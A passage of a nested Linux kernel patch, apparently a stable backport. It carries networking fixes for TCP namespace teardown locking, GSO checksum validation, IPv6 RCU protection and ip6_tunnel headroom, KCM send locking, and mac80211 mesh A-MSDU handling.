+-		struct inet_ehash_bucket *head = &hashinfo->ehash[slot];
++	for (slot = 0; slot <= ehash_mask; slot++, head++) {
++		if (hlist_nulls_empty(&head->chain))
++			continue;
++
+ restart_rcu:
+ 		cond_resched();
+ 		rcu_read_lock();
+@@ -301,15 +305,13 @@ void inet_twsk_purge(struct inet_hashinfo *hashinfo, int family)
+ 					     TCPF_NEW_SYN_RECV))
+ 				continue;
+ 
+-			if (sk->sk_family != family ||
+-			    refcount_read(&sock_net(sk)->ns.count))
++			if (refcount_read(&sock_net(sk)->ns.count))
+ 				continue;
+ 
+ 			if (unlikely(!refcount_inc_not_zero(&sk->sk_refcnt)))
+ 				continue;
+ 
+-			if (unlikely(sk->sk_family != family ||
+-				     refcount_read(&sock_net(sk)->ns.count))) {
++			if (refcount_read(&sock_net(sk)->ns.count)) {
+ 				sock_gen_put(sk);
+ 				goto restart;
+ 			}
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index c64ba4f8ddaa9..1327447a3aade 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -93,6 +93,8 @@ EXPORT_SYMBOL(tcp_hashinfo);
+ 
+ static DEFINE_PER_CPU(struct sock *, ipv4_tcp_sk);
+ 
++static DEFINE_MUTEX(tcp_exit_batch_mutex);
++
+ static u32 tcp_v4_init_seq(const struct sk_buff *skb)
+ {
+ 	return secure_tcp_seq(ip_hdr(skb)->daddr,
+@@ -3242,13 +3244,25 @@ static void __net_exit tcp_sk_exit_batch(struct list_head *net_exit_list)
+ {
+ 	struct net *net;
+ 
+-	tcp_twsk_purge(net_exit_list, AF_INET);
++	/* make sure concurrent calls to tcp_sk_exit_batch from net_cleanup_work
++	 * and failed setup_net error unwinding path are serialized.
++	 *
++	 * tcp_twsk_purge() handles twsk in any dead netns, not just those in
++	 * net_exit_list, the thread that dismantles a particular twsk must
++	 * do so without other thread progressing to refcount_dec_and_test() of
++	 * tcp_death_row.tw_refcount.
++	 */
++	mutex_lock(&tcp_exit_batch_mutex);
++
++	tcp_twsk_purge(net_exit_list);
+ 
+ 	list_for_each_entry(net, net_exit_list, exit_list) {
+ 		inet_pernet_hashinfo_free(net->ipv4.tcp_death_row.hashinfo);
+ 		WARN_ON_ONCE(!refcount_dec_and_test(&net->ipv4.tcp_death_row.tw_refcount));
+ 		tcp_fastopen_ctx_destroy(net);
+ 	}
++
++	mutex_unlock(&tcp_exit_batch_mutex);
+ }
+ 
+ static struct pernet_operations __net_initdata tcp_sk_ops = {
+diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
+index b3bfa1a09df68..c562cb965e742 100644
+--- a/net/ipv4/tcp_minisocks.c
++++ b/net/ipv4/tcp_minisocks.c
+@@ -347,7 +347,7 @@ void tcp_twsk_destructor(struct sock *sk)
+ }
+ EXPORT_SYMBOL_GPL(tcp_twsk_destructor);
+ 
+-void tcp_twsk_purge(struct list_head *net_exit_list, int family)
++void tcp_twsk_purge(struct list_head *net_exit_list)
+ {
+ 	bool purged_once = false;
+ 	struct net *net;
+@@ -355,14 +355,13 @@ void tcp_twsk_purge(struct list_head *net_exit_list, int family)
+ 	list_for_each_entry(net, net_exit_list, exit_list) {
+ 		if (net->ipv4.tcp_death_row.hashinfo->pernet) {
+ 			/* Even if tw_refcount == 1, we must clean up kernel reqsk */
+-			inet_twsk_purge(net->ipv4.tcp_death_row.hashinfo, family);
++			inet_twsk_purge(net->ipv4.tcp_death_row.hashinfo);
+ 		} else if (!purged_once) {
+-			inet_twsk_purge(&tcp_hashinfo, family);
++			inet_twsk_purge(&tcp_hashinfo);
+ 			purged_once = true;
+ 		}
+ 	}
+ }
+-EXPORT_SYMBOL_GPL(tcp_twsk_purge);
+ 
+ /* Warning : This function is called without sk_listener being locked.
+  * Be sure to read socket fields once, as their value could change under us.
+diff --git a/net/ipv4/tcp_offload.c b/net/ipv4/tcp_offload.c
+index 4851211aa60d6..72a645bf05c92 100644
+--- a/net/ipv4/tcp_offload.c
++++ b/net/ipv4/tcp_offload.c
+@@ -72,6 +72,9 @@ struct sk_buff *tcp_gso_segment(struct sk_buff *skb,
+ 	if (thlen < sizeof(*th))
+ 		goto out;
+ 
++	if (unlikely(skb_checksum_start(skb) != skb_transport_header(skb)))
++		goto out;
++
+ 	if (!pskb_may_pull(skb, thlen))
+ 		goto out;
+ 
+diff --git a/net/ipv4/udp_offload.c b/net/ipv4/udp_offload.c
+index 794ea24292f62..84cc3f6e14728 100644
+--- a/net/ipv4/udp_offload.c
++++ b/net/ipv4/udp_offload.c
+@@ -273,13 +273,25 @@ struct sk_buff *__udp_gso_segment(struct sk_buff *gso_skb,
+ 	__sum16 check;
+ 	__be16 newlen;
+ 
+-	if (skb_shinfo(gso_skb)->gso_type & SKB_GSO_FRAGLIST)
+-		return __udp_gso_segment_list(gso_skb, features, is_ipv6);
+-
+ 	mss = skb_shinfo(gso_skb)->gso_size;
+ 	if (gso_skb->len <= sizeof(*uh) + mss)
+ 		return ERR_PTR(-EINVAL);
+ 
++	if (unlikely(skb_checksum_start(gso_skb) !=
++		     skb_transport_header(gso_skb) &&
++		     !(skb_shinfo(gso_skb)->gso_type & SKB_GSO_FRAGLIST)))
++		return ERR_PTR(-EINVAL);
++
++	if (skb_gso_ok(gso_skb, features | NETIF_F_GSO_ROBUST)) {
++		/* Packet is from an untrusted source, reset gso_segs. */
++		skb_shinfo(gso_skb)->gso_segs = DIV_ROUND_UP(gso_skb->len - sizeof(*uh),
++							     mss);
++		return NULL;
++	}
++
++	if (skb_shinfo(gso_skb)->gso_type & SKB_GSO_FRAGLIST)
++		return __udp_gso_segment_list(gso_skb, features, is_ipv6);
++
+ 	skb_pull(gso_skb, sizeof(*uh));
+ 
+ 	/* clear destructor to avoid skb_segment assigning it to tail */
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index df79044fbf3c4..f2227e662d1cf 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -69,11 +69,15 @@ static int ip6_finish_output2(struct net *net, struct sock *sk, struct sk_buff *
+ 
+ 	/* Be paranoid, rather than too clever. */
+ 	if (unlikely(hh_len > skb_headroom(skb)) && dev->header_ops) {
++		/* Make sure idev stays alive */
++		rcu_read_lock();
+ 		skb = skb_expand_head(skb, hh_len);
+ 		if (!skb) {
+ 			IP6_INC_STATS(net, idev, IPSTATS_MIB_OUTDISCARDS);
++			rcu_read_unlock();
+ 			return -ENOMEM;
+ 		}
++		rcu_read_unlock();
+ 	}
+ 
+ 	hdr = ipv6_hdr(skb);
+@@ -274,11 +278,15 @@ int ip6_xmit(const struct sock *sk, struct sk_buff *skb, struct flowi6 *fl6,
+ 		head_room += opt->opt_nflen + opt->opt_flen;
+ 
+ 	if (unlikely(head_room > skb_headroom(skb))) {
++		/* Make sure idev stays alive */
++		rcu_read_lock();
+ 		skb = skb_expand_head(skb, head_room);
+ 		if (!skb) {
+ 			IP6_INC_STATS(net, idev, IPSTATS_MIB_OUTDISCARDS);
++			rcu_read_unlock();
+ 			return -ENOBUFS;
+ 		}
++		rcu_read_unlock();
+ 	}
+ 
+ 	if (opt) {
+@@ -1993,6 +2001,7 @@ int ip6_send_skb(struct sk_buff *skb)
+ 	struct rt6_info *rt = (struct rt6_info *)skb_dst(skb);
+ 	int err;
+ 
++	rcu_read_lock();
+ 	err = ip6_local_out(net, skb->sk, skb);
+ 	if (err) {
+ 		if (err > 0)
+@@ -2002,6 +2011,7 @@ int ip6_send_skb(struct sk_buff *skb)
+ 				      IPSTATS_MIB_OUTDISCARDS);
+ 	}
+ 
++	rcu_read_unlock();
+ 	return err;
+ }
+ 
+diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
+index 2699915bb85be..f3324f2a40466 100644
+--- a/net/ipv6/ip6_tunnel.c
++++ b/net/ipv6/ip6_tunnel.c
+@@ -1510,7 +1510,8 @@ static void ip6_tnl_link_config(struct ip6_tnl *t)
+ 			tdev = __dev_get_by_index(t->net, p->link);
+ 
+ 		if (tdev) {
+-			dev->hard_header_len = tdev->hard_header_len + t_hlen;
++			dev->needed_headroom = tdev->hard_header_len +
++				tdev->needed_headroom + t_hlen;
+ 			mtu = min_t(unsigned int, tdev->mtu, IP6_MAX_MTU);
+ 
+ 			mtu = mtu - t_hlen;
+@@ -1734,7 +1735,9 @@ ip6_tnl_siocdevprivate(struct net_device *dev, struct ifreq *ifr,
+ int ip6_tnl_change_mtu(struct net_device *dev, int new_mtu)
+ {
+ 	struct ip6_tnl *tnl = netdev_priv(dev);
++	int t_hlen;
+ 
++	t_hlen = tnl->hlen + sizeof(struct ipv6hdr);
+ 	if (tnl->parms.proto == IPPROTO_IPV6) {
+ 		if (new_mtu < IPV6_MIN_MTU)
+ 			return -EINVAL;
+@@ -1743,10 +1746,10 @@ int ip6_tnl_change_mtu(struct net_device *dev, int new_mtu)
+ 			return -EINVAL;
+ 	}
+ 	if (tnl->parms.proto == IPPROTO_IPV6 || tnl->parms.proto == 0) {
+-		if (new_mtu > IP6_MAX_MTU - dev->hard_header_len)
++		if (new_mtu > IP6_MAX_MTU - dev->hard_header_len - t_hlen)
+ 			return -EINVAL;
+ 	} else {
+-		if (new_mtu > IP_MAX_MTU - dev->hard_header_len)
++		if (new_mtu > IP_MAX_MTU - dev->hard_header_len - t_hlen)
+ 			return -EINVAL;
+ 	}
+ 	dev->mtu = new_mtu;
+@@ -1892,12 +1895,11 @@ ip6_tnl_dev_init_gen(struct net_device *dev)
+ 	t_hlen = t->hlen + sizeof(struct ipv6hdr);
+ 
+ 	dev->type = ARPHRD_TUNNEL6;
+-	dev->hard_header_len = LL_MAX_HEADER + t_hlen;
+ 	dev->mtu = ETH_DATA_LEN - t_hlen;
+ 	if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT))
+ 		dev->mtu -= 8;
+ 	dev->min_mtu = ETH_MIN_MTU;
+-	dev->max_mtu = IP6_MAX_MTU - dev->hard_header_len;
++	dev->max_mtu = IP6_MAX_MTU - dev->hard_header_len - t_hlen;
+ 
+ 	netdev_hold(dev, &t->dev_tracker, GFP_KERNEL);
+ 	return 0;
+diff --git a/net/ipv6/netfilter/nf_conntrack_reasm.c b/net/ipv6/netfilter/nf_conntrack_reasm.c
+index 87a394179092c..e4b45db8a3992 100644
+--- a/net/ipv6/netfilter/nf_conntrack_reasm.c
++++ b/net/ipv6/netfilter/nf_conntrack_reasm.c
+@@ -154,6 +154,10 @@ static struct frag_queue *fq_find(struct net *net, __be32 id, u32 user,
+ 	};
+ 	struct inet_frag_queue *q;
+ 
++	if (!(ipv6_addr_type(&hdr->daddr) & (IPV6_ADDR_MULTICAST |
++					    IPV6_ADDR_LINKLOCAL)))
++		key.iif = 0;
++
+ 	q = inet_frag_find(nf_frag->fqdir, &key);
+ 	if (!q)
+ 		return NULL;
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index eb6fc0e2a4533..06b4acbfd314b 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -2217,15 +2217,9 @@ static void __net_exit tcpv6_net_exit(struct net *net)
+ 	inet_ctl_sock_destroy(net->ipv6.tcp_sk);
+ }
+ 
+-static void __net_exit tcpv6_net_exit_batch(struct list_head *net_exit_list)
+-{
+-	tcp_twsk_purge(net_exit_list, AF_INET6);
+-}
+-
+ static struct pernet_operations tcpv6_net_ops = {
+ 	.init	    = tcpv6_net_init,
+ 	.exit	    = tcpv6_net_exit,
+-	.exit_batch = tcpv6_net_exit_batch,
+ };
+ 
+ int __init tcpv6_init(void)
+diff --git a/net/iucv/iucv.c b/net/iucv/iucv.c
+index db41eb2d977f2..038e1ba9aec27 100644
+--- a/net/iucv/iucv.c
++++ b/net/iucv/iucv.c
+@@ -1090,8 +1090,7 @@ static int iucv_message_receive_iprmdata(struct iucv_path *path,
+ 		size = (size < 8) ? size : 8;
+ 		for (array = buffer; size > 0; array++) {
+ 			copy = min_t(size_t, size, array->length);
+-			memcpy((u8 *)(addr_t) array->address,
+-				rmmsg, copy);
++			memcpy(phys_to_virt(array->address), rmmsg, copy);
+ 			rmmsg += copy;
+ 			size -= copy;
+ 		}
+diff --git a/net/kcm/kcmsock.c b/net/kcm/kcmsock.c
+index 7d37bf4334d26..462bdb6bfa4d8 100644
+--- a/net/kcm/kcmsock.c
++++ b/net/kcm/kcmsock.c
+@@ -912,6 +912,7 @@ static int kcm_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 		  !(msg->msg_flags & MSG_MORE) : !!(msg->msg_flags & MSG_EOR);
+ 	int err = -EPIPE;
+ 
++	mutex_lock(&kcm->tx_mutex);
+ 	lock_sock(sk);
+ 
+ 	/* Per tcp_sendmsg this should be in poll */
+@@ -1060,6 +1061,7 @@ static int kcm_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 	KCM_STATS_ADD(kcm->stats.tx_bytes, copied);
+ 
+ 	release_sock(sk);
++	mutex_unlock(&kcm->tx_mutex);
+ 	return copied;
+ 
+ out_error:
+@@ -1085,6 +1087,7 @@ static int kcm_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 		sk->sk_write_space(sk);
+ 
+ 	release_sock(sk);
++	mutex_unlock(&kcm->tx_mutex);
+ 	return err;
+ }
+ 
+@@ -1325,6 +1328,7 @@ static void init_kcm_sock(struct kcm_sock *kcm, struct kcm_mux *mux)
+ 	spin_unlock_bh(&mux->lock);
+ 
+ 	INIT_WORK(&kcm->tx_work, kcm_tx_work);
++	mutex_init(&kcm->tx_mutex);
+ 
+ 	spin_lock_bh(&mux->rx_lock);
+ 	kcm_rcv_ready(kcm);
+diff --git a/net/mac80211/agg-tx.c b/net/mac80211/agg-tx.c
+index 85d2b9e4b51ce..e26a72f3a1042 100644
+--- a/net/mac80211/agg-tx.c
++++ b/net/mac80211/agg-tx.c
+@@ -491,7 +491,7 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ {
+ 	struct tid_ampdu_tx *tid_tx;
+ 	struct ieee80211_local *local = sta->local;
+-	struct ieee80211_sub_if_data *sdata;
++	struct ieee80211_sub_if_data *sdata = sta->sdata;
+ 	struct ieee80211_ampdu_params params = {
+ 		.sta = &sta->sta,
+ 		.action = IEEE80211_AMPDU_TX_START,
+@@ -519,7 +519,6 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ 	 */
+ 	synchronize_net();
+ 
+-	sdata = sta->sdata;
+ 	params.ssn = sta->tid_seq[tid] >> 4;
+ 	ret = drv_ampdu_action(local, sdata, &params);
+ 	tid_tx->ssn = params.ssn;
+@@ -533,9 +532,6 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ 		 */
+ 		set_bit(HT_AGG_STATE_DRV_READY, &tid_tx->state);
+ 	} else if (ret) {
+-		if (!sdata)
+-			return;
+-
+ 		ht_dbg(sdata,
+ 		       "BA request denied - HW unavailable for %pM tid %d\n",
+ 		       sta->sta.addr, tid);
+diff --git a/net/mac80211/debugfs_netdev.c b/net/mac80211/debugfs_netdev.c
+index 08a1d7564b7f2..8ced615add712 100644
+--- a/net/mac80211/debugfs_netdev.c
++++ b/net/mac80211/debugfs_netdev.c
+@@ -603,8 +603,6 @@ IEEE80211_IF_FILE(fwded_mcast, u.mesh.mshstats.fwded_mcast, DEC);
+ IEEE80211_IF_FILE(fwded_unicast, u.mesh.mshstats.fwded_unicast, DEC);
+ IEEE80211_IF_FILE(fwded_frames, u.mesh.mshstats.fwded_frames, DEC);
+ IEEE80211_IF_FILE(dropped_frames_ttl, u.mesh.mshstats.dropped_frames_ttl, DEC);
+-IEEE80211_IF_FILE(dropped_frames_congestion,
+-		  u.mesh.mshstats.dropped_frames_congestion, DEC);
+ IEEE80211_IF_FILE(dropped_frames_no_route,
+ 		  u.mesh.mshstats.dropped_frames_no_route, DEC);
+ 
+@@ -741,7 +739,6 @@ static void add_mesh_stats(struct ieee80211_sub_if_data *sdata)
+ 	MESHSTATS_ADD(fwded_frames);
+ 	MESHSTATS_ADD(dropped_frames_ttl);
+ 	MESHSTATS_ADD(dropped_frames_no_route);
+-	MESHSTATS_ADD(dropped_frames_congestion);
+ #undef MESHSTATS_ADD
+ }
+ 
+diff --git a/net/mac80211/driver-ops.c b/net/mac80211/driver-ops.c
+index c08d3c9a4a177..5392ffa182704 100644
+--- a/net/mac80211/driver-ops.c
++++ b/net/mac80211/driver-ops.c
+@@ -391,9 +391,6 @@ int drv_ampdu_action(struct ieee80211_local *local,
+ 
+ 	might_sleep();
+ 
+-	if (!sdata)
+-		return -EIO;
+-
+ 	sdata = get_bss_sdata(sdata);
+ 	if (!check_sdata_in_driver(sdata))
+ 		return -EIO;
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 709eb7bfcf194..8a3af4144d3f0 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -327,7 +327,6 @@ struct mesh_stats {
+ 	__u32 fwded_frames;		/* Mesh total forwarded frames */
+ 	__u32 dropped_frames_ttl;	/* Not transmitted since mesh_ttl == 0*/
+ 	__u32 dropped_frames_no_route;	/* Not transmitted, no route found */
+-	__u32 dropped_frames_congestion;/* Not forwarded due to congestion */
+ };
+ 
+ #define PREQ_Q_F_START		0x1
+diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c
+index e00e1bf0f754a..6a9d81e9069c9 100644
+--- a/net/mac80211/iface.c
++++ b/net/mac80211/iface.c
+@@ -251,9 +251,9 @@ static int ieee80211_can_powered_addr_change(struct ieee80211_sub_if_data *sdata
+ 	return ret;
+ }
+ 
+-static int ieee80211_change_mac(struct net_device *dev, void *addr)
++static int _ieee80211_change_mac(struct ieee80211_sub_if_data *sdata,
++				 void *addr)
+ {
+-	struct ieee80211_sub_if_data *sdata = IEEE80211_DEV_TO_SUB_IF(dev);
+ 	struct ieee80211_local *local = sdata->local;
+ 	struct sockaddr *sa = addr;
+ 	bool check_dup = true;
+@@ -278,7 +278,7 @@ static int ieee80211_change_mac(struct net_device *dev, void *addr)
+ 
+ 	if (live)
+ 		drv_remove_interface(local, sdata);
+-	ret = eth_mac_addr(dev, sa);
++	ret = eth_mac_addr(sdata->dev, sa);
+ 
+ 	if (ret == 0) {
+ 		memcpy(sdata->vif.addr, sa->sa_data, ETH_ALEN);
+@@ -294,6 +294,27 @@ static int ieee80211_change_mac(struct net_device *dev, void *addr)
+ 	return ret;
+ }
+ 
++static int ieee80211_change_mac(struct net_device *dev, void *addr)
++{
++	struct ieee80211_sub_if_data *sdata = IEEE80211_DEV_TO_SUB_IF(dev);
++	struct ieee80211_local *local = sdata->local;
++	int ret;
++
++	/*
++	 * This happens during unregistration if there's a bond device
++	 * active (maybe other cases?) and we must get removed from it.
++	 * But we really don't care anymore if it's not registered now.
++	 */
++	if (!dev->ieee80211_ptr->registered)
++		return 0;
++
++	wiphy_lock(local->hw.wiphy);
++	ret = _ieee80211_change_mac(sdata, addr);
++	wiphy_unlock(local->hw.wiphy);
++
++	return ret;
++}
++
+ static inline int identical_mac_addr_allowed(int type1, int type2)
+ {
+ 	return type1 == NL80211_IFTYPE_MONITOR ||
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index c4c80037df91d..b6077a97af1dc 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -2408,7 +2408,6 @@ static int ieee80211_802_1x_port_control(struct ieee80211_rx_data *rx)
+ 
+ static int ieee80211_drop_unencrypted(struct ieee80211_rx_data *rx, __le16 fc)
+ {
+-	struct ieee80211_hdr *hdr = (void *)rx->skb->data;
+ 	struct sk_buff *skb = rx->skb;
+ 	struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+ 
+@@ -2419,31 +2418,6 @@ static int ieee80211_drop_unencrypted(struct ieee80211_rx_data *rx, __le16 fc)
+ 	if (status->flag & RX_FLAG_DECRYPTED)
+ 		return 0;
+ 
+-	/* check mesh EAPOL frames first */
+-	if (unlikely(rx->sta && ieee80211_vif_is_mesh(&rx->sdata->vif) &&
+-		     ieee80211_is_data(fc))) {
+-		struct ieee80211s_hdr *mesh_hdr;
+-		u16 hdr_len = ieee80211_hdrlen(fc);
+-		u16 ethertype_offset;
+-		__be16 ethertype;
+-
+-		if (!ether_addr_equal(hdr->addr1, rx->sdata->vif.addr))
+-			goto drop_check;
+-
+-		/* make sure fixed part of mesh header is there, also checks skb len */
+-		if (!pskb_may_pull(rx->skb, hdr_len + 6))
+-			goto drop_check;
+-
+-		mesh_hdr = (struct ieee80211s_hdr *)(skb->data + hdr_len);
+-		ethertype_offset = hdr_len + ieee80211_get_mesh_hdrlen(mesh_hdr) +
+-				   sizeof(rfc1042_header);
+-
+-		if (skb_copy_bits(rx->skb, ethertype_offset, &ethertype, 2) == 0 &&
+-		    ethertype == rx->sdata->control_port_protocol)
+-			return 0;
+-	}
+-
+-drop_check:
+ 	/* Drop unencrypted frames if key is set. */
+ 	if (unlikely(!ieee80211_has_protected(fc) &&
+ 		     !ieee80211_is_any_nullfunc(fc) &&
+@@ -2751,6 +2725,177 @@ ieee80211_deliver_skb(struct ieee80211_rx_data *rx)
+ 	}
+ }
+ 
++static ieee80211_rx_result
++ieee80211_rx_mesh_data(struct ieee80211_sub_if_data *sdata, struct sta_info *sta,
++		       struct sk_buff *skb)
++{
++#ifdef CONFIG_MAC80211_MESH
++	struct ieee80211_if_mesh *ifmsh = &sdata->u.mesh;
++	struct ieee80211_local *local = sdata->local;
++	uint16_t fc = IEEE80211_FTYPE_DATA | IEEE80211_STYPE_QOS_DATA;
++	struct ieee80211_hdr hdr = {
++		.frame_control = cpu_to_le16(fc)
++	};
++	struct ieee80211_hdr *fwd_hdr;
++	struct ieee80211s_hdr *mesh_hdr;
++	struct ieee80211_tx_info *info;
++	struct sk_buff *fwd_skb;
++	struct ethhdr *eth;
++	bool multicast;
++	int tailroom = 0;
++	int hdrlen, mesh_hdrlen;
++	u8 *qos;
++
++	if (!ieee80211_vif_is_mesh(&sdata->vif))
++		return RX_CONTINUE;
++
++	if (!pskb_may_pull(skb, sizeof(*eth) + 6))
++		return RX_DROP_MONITOR;
++
++	mesh_hdr = (struct ieee80211s_hdr *)(skb->data + sizeof(*eth));
++	mesh_hdrlen = ieee80211_get_mesh_hdrlen(mesh_hdr);
++
++	if (!pskb_may_pull(skb, sizeof(*eth) + mesh_hdrlen))
++		return RX_DROP_MONITOR;
++
++	eth = (struct ethhdr *)skb->data;
++	multicast = is_multicast_ether_addr(eth->h_dest);
++
++	mesh_hdr = (struct ieee80211s_hdr *)(eth + 1);
++	if (!mesh_hdr->ttl)
++		return RX_DROP_MONITOR;
++
++	/* frame is in RMC, don't forward */
++	if (is_multicast_ether_addr(eth->h_dest) &&
++	    mesh_rmc_check(sdata, eth->h_source, mesh_hdr))
++		return RX_DROP_MONITOR;
++
++	/* forward packet */
++	if (sdata->crypto_tx_tailroom_needed_cnt)
++		tailroom = IEEE80211_ENCRYPT_TAILROOM;
++
++	if (mesh_hdr->flags & MESH_FLAGS_AE) {
++		struct mesh_path *mppath;
++		char *proxied_addr;
++
++		if (multicast)
++			proxied_addr = mesh_hdr->eaddr1;
++		else if ((mesh_hdr->flags & MESH_FLAGS_AE) == MESH_FLAGS_AE_A5_A6)
++			/* has_a4 already checked in ieee80211_rx_mesh_check */
++			proxied_addr = mesh_hdr->eaddr2;
++		else
++			return RX_DROP_MONITOR;
++
++		rcu_read_lock();
++		mppath = mpp_path_lookup(sdata, proxied_addr);
++		if (!mppath) {
++			mpp_path_add(sdata, proxied_addr, eth->h_source);
++		} else {
++			spin_lock_bh(&mppath->state_lock);
++			if (!ether_addr_equal(mppath->mpp, eth->h_source))
++				memcpy(mppath->mpp, eth->h_source, ETH_ALEN);
++			mppath->exp_time = jiffies;
++			spin_unlock_bh(&mppath->state_lock);
++		}
++		rcu_read_unlock();
++	}
++
++	/* Frame has reached destination.  Don't forward */
++	if (ether_addr_equal(sdata->vif.addr, eth->h_dest))
++		goto rx_accept;
++
++	if (!--mesh_hdr->ttl) {
++		if (multicast)
++			goto rx_accept;
++
++		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, dropped_frames_ttl);
++		return RX_DROP_MONITOR;
++	}
++
++	if (!ifmsh->mshcfg.dot11MeshForwarding) {
++		if (is_multicast_ether_addr(eth->h_dest))
++			goto rx_accept;
++
++		return RX_DROP_MONITOR;
++	}
++
++	skb_set_queue_mapping(skb, ieee802_1d_to_ac[skb->priority]);
++
++	ieee80211_fill_mesh_addresses(&hdr, &hdr.frame_control,
++				      eth->h_dest, eth->h_source);
++	hdrlen = ieee80211_hdrlen(hdr.frame_control);
++	if (multicast) {
++		int extra_head = sizeof(struct ieee80211_hdr) - sizeof(*eth);
++
++		fwd_skb = skb_copy_expand(skb, local->tx_headroom + extra_head +
++					       IEEE80211_ENCRYPT_HEADROOM,
++					  tailroom, GFP_ATOMIC);
++		if (!fwd_skb)
++			goto rx_accept;
++	} else {
++		fwd_skb = skb;
++		skb = NULL;
++
++		if (skb_cow_head(fwd_skb, hdrlen - sizeof(struct ethhdr)))
++			return RX_DROP_UNUSABLE;
++
++		if (skb_linearize(fwd_skb))
++			return RX_DROP_UNUSABLE;
++	}
++
++	fwd_hdr = skb_push(fwd_skb, hdrlen - sizeof(struct ethhdr));
++	memcpy(fwd_hdr, &hdr, hdrlen - 2);
++	qos = ieee80211_get_qos_ctl(fwd_hdr);
++	qos[0] = qos[1] = 0;
++
++	skb_reset_mac_header(fwd_skb);
++	hdrlen += mesh_hdrlen;
++	if (ieee80211_get_8023_tunnel_proto(fwd_skb->data + hdrlen,
++					    &fwd_skb->protocol))
++		hdrlen += ETH_ALEN;
++	else
++		fwd_skb->protocol = htons(fwd_skb->len - hdrlen);
++	skb_set_network_header(fwd_skb, hdrlen + 2);
++
++	info = IEEE80211_SKB_CB(fwd_skb);
++	memset(info, 0, sizeof(*info));
++	info->control.flags |= IEEE80211_TX_INTCFL_NEED_TXPROCESSING;
++	info->control.vif = &sdata->vif;
++	info->control.jiffies = jiffies;
++	if (multicast) {
++		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_mcast);
++		memcpy(fwd_hdr->addr2, sdata->vif.addr, ETH_ALEN);
++		/* update power mode indication when forwarding */
++		ieee80211_mps_set_frame_flags(sdata, NULL, fwd_hdr);
++	} else if (!mesh_nexthop_lookup(sdata, fwd_skb)) {
++		/* mesh power mode flags updated in mesh_nexthop_lookup */
++		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_unicast);
++	} else {
++		/* unable to resolve next hop */
++		if (sta)
++			mesh_path_error_tx(sdata, ifmsh->mshcfg.element_ttl,
++					   hdr.addr3, 0,
++					   WLAN_REASON_MESH_PATH_NOFORWARD,
++					   sta->sta.addr);
++		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, dropped_frames_no_route);
++		kfree_skb(fwd_skb);
++		goto rx_accept;
++	}
++
++	IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_frames);
++	fwd_skb->dev = sdata->dev;
++	ieee80211_add_pending_skb(local, fwd_skb);
++
++rx_accept:
++	if (!skb)
++		return RX_QUEUED;
++
++	ieee80211_strip_8023_mesh_hdr(skb);
++#endif
++
++	return RX_CONTINUE;
++}
++
+ static ieee80211_rx_result debug_noinline
+ __ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx, u8 data_offset)
+ {
+@@ -2759,6 +2904,7 @@ __ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx, u8 data_offset)
+ 	struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)skb->data;
+ 	__le16 fc = hdr->frame_control;
+ 	struct sk_buff_head frame_list;
++	ieee80211_rx_result res;
+ 	struct ethhdr ethhdr;
+ 	const u8 *check_da = ethhdr.h_dest, *check_sa = ethhdr.h_source;
+ 
+@@ -2777,6 +2923,7 @@ __ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx, u8 data_offset)
+ 			break;
+ 		case NL80211_IFTYPE_MESH_POINT:
+ 			check_sa = NULL;
++			check_da = NULL;
+ 			break;
+ 		default:
+ 			break;
+@@ -2791,20 +2938,43 @@ __ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx, u8 data_offset)
+ 					  data_offset, true))
+ 		return RX_DROP_UNUSABLE;
+ 
++	if (rx->sta->amsdu_mesh_control < 0) {
++		bool valid_std = ieee80211_is_valid_amsdu(skb, true);
++		bool valid_nonstd = ieee80211_is_valid_amsdu(skb, false);
++
++		if (valid_std && !valid_nonstd)
++			rx->sta->amsdu_mesh_control = 1;
++		else if (valid_nonstd && !valid_std)
++			rx->sta->amsdu_mesh_control = 0;
++	}
++
+ 	ieee80211_amsdu_to_8023s(skb, &frame_list, dev->dev_addr,
+ 				 rx->sdata->vif.type,
+ 				 rx->local->hw.extra_tx_headroom,
+-				 check_da, check_sa);
++				 check_da, check_sa,
++				 rx->sta->amsdu_mesh_control);
+ 
+ 	while (!skb_queue_empty(&frame_list)) {
+ 		rx->skb = __skb_dequeue(&frame_list);
+ 
+-		if (!ieee80211_frame_allowed(rx, fc)) {
+-			dev_kfree_skb(rx->skb);
++		res = ieee80211_rx_mesh_data(rx->sdata, rx->sta, rx->skb);
++		switch (res) {
++		case RX_QUEUED:
+ 			continue;
++		case RX_CONTINUE:
++			break;
++		default:
++			goto free;
+ 		}
+ 
++		if (!ieee80211_frame_allowed(rx, fc))
++			goto free;
++
+ 		ieee80211_deliver_skb(rx);
